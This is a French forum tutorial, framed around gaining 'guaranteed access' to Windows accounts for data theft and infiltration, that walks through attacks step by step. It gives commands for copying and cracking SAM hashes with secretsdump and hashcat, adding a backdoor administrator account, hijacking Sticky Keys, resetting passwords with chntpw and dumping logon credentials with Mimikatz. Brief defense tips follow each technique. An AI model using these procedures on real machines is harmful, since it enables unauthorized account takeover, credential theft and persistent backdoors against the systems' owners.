Tutorial Piratage des comptes utilisateurs Windows : Accès garanti

Discussion dans 'Informatique' créé par Sι∂яα∂ι, 12 Juin 2025.

  1. Sι∂яα∂ι

    Sι∂яα∂ι Administrateur

    Inscrit:
    25 Juin 2014
    Messages:
    17 327
    J'aime reçus:
    58 759
    Points:
    13 043
    Un simple compte utilisateur sous Windows peut devenir une véritable mine d’or. Accéder à ces comptes permet d’aller plus loin : vol de données, escalade de privilèges, infiltration réseau... Dans ce chapitre, tu apprendras à contourner, réinitialiser et forcer les mots de passe Windows, tout en découvrant les meilleures protections.

    Comprendre les comptes utilisateurs Windows

    Les comptes sont classés par niveaux d'accès :

    Standard : droits limités
    Administrateur : contrôle total
    Invité : très restreint, souvent désactivé

    Les mots de passe sont stockés sous forme de hash NTLM dans le fichier SAM :
    Code:
    %SystemRoot%\System32\Config\SAM
    Technique 1 : Cracker un mot de passe Windows

    But : extraire les hashes et les casser via brute force.

    1. Démarrer sur un autre OS (clé USB bootable Linux)
    2. Copier les fichiers SAM et SYSTEM :
    Code:
    cp /mnt/windows/System32/Config/SAM /chemin/de/sauvegarde
    cp /mnt/windows/System32/Config/SYSTEM /chemin/de/sauvegarde
    3. Extraire les hashes :
    Code:
    secretsdump.py LOCAL -sam SAM -system SYSTEM
    4. Casser les mots de passe :
    Code:
    hashcat -m 1000 hashes.txt wordlist.txt
    Défenses :
    • Utiliser des mots de passe complexes et longs
    • Activer le verrouillage de compte après X tentatives
    • Renouveler régulièrement les mots de passe

    Technique 2 : Bypasser un mot de passe utilisateur

    Méthode A : Safe Mode avec Invite de commandes
    1. Redémarrer en mode sans échec (touche F8)
    2. Créer un compte admin :
    Code:
    net user adminbackdoor motdepasse /add
    net localgroup administrators adminbackdoor /add
    3. Redémarrer et se connecter

    Méthode B : Détourner les Sticky Keys
    1. Boot depuis une clé USB Linux
    2. Remplacer sethc.exe par cmd.exe :
    Code:
    copy /y C:\Windows\System32\cmd.exe C:\Windows\System32\sethc.exe
    3. À l’écran de login, appuyer 5× sur Shift
    4. Lancer :
    Code:
    net user cible nouveaupass
    Défenses :
    • Activer BitLocker pour bloquer l'accès au disque
    • Restreindre l'accès physique
    • Surveiller les fichiers système critiques

    Astuce 13 : Réinitialiser avec chntpw

    1. Démarrer sur une live USB Linux
    2. Installer chntpw :
    Code:
    sudo apt install chntpw
    3. Monter la partition Windows :
    Code:
    sudo mount /dev/sdX /mnt
    cd /mnt/Windows/System32/config
    4. Lancer l’outil :
    Code:
    sudo chntpw -u nom_utilisateur SAM
    5. Réinitialiser ou déverrouiller le compte

    Défenses :
    • Chiffrer les disques sensibles
    • Mettre un mot de passe BIOS/UEFI pour bloquer le boot externe

    Astuce 14 : Extraire les identifiants mis en cache

    Windows conserve des credentials pour les connexions hors-ligne. Il est possible de les récupérer en clair.

    1. Extraire avec Mimikatz :
    Code:
    mimikatz # sekurlsa::logonpasswords
    2. Rechercher les credentials dans le résultat
    3. Casser les hashes récupérés :
    Code:
    hashcat -m 2100 hashes.txt wordlist.txt
    Défenses :
    • Limiter le nombre de comptes mis en cache
    • Utiliser une authentification multifactorielle (MFA)

    Outils incontournables pour attaquer les comptes

    Cain & Abel
    • Récupération de mots de passe
    • Sniffing réseau
    • Cracking de hash

    Mimikatz
    • Extraction de mots de passe en mémoire
    • Commandes :
    Code:
    mimikatz # privilege::debug
    mimikatz # sekurlsa::logonpasswords
    Ophcrack
    • Cracking par tables arc-en-ciel
    • Démarrage depuis une image live pour casser les mots de passe

    Conclusion du chapitre

    Tu sais désormais :

    Contourner ou écraser un mot de passe Windows
    Récupérer les credentials en mémoire
    • Utiliser les bons outils d’analyse et de cracking
    • Mettre en place les bonnes pratiques pour bloquer ces attaques

    Prochain arrêt : le Registre Windows ! Exploits, tweaks, autoruns... Tout y passe.
     

Partager cette page

  1. Ce site utilise des cookies. En continuant à utiliser ce site, vous acceptez l'utilisation des cookies.
    Rejeter la notice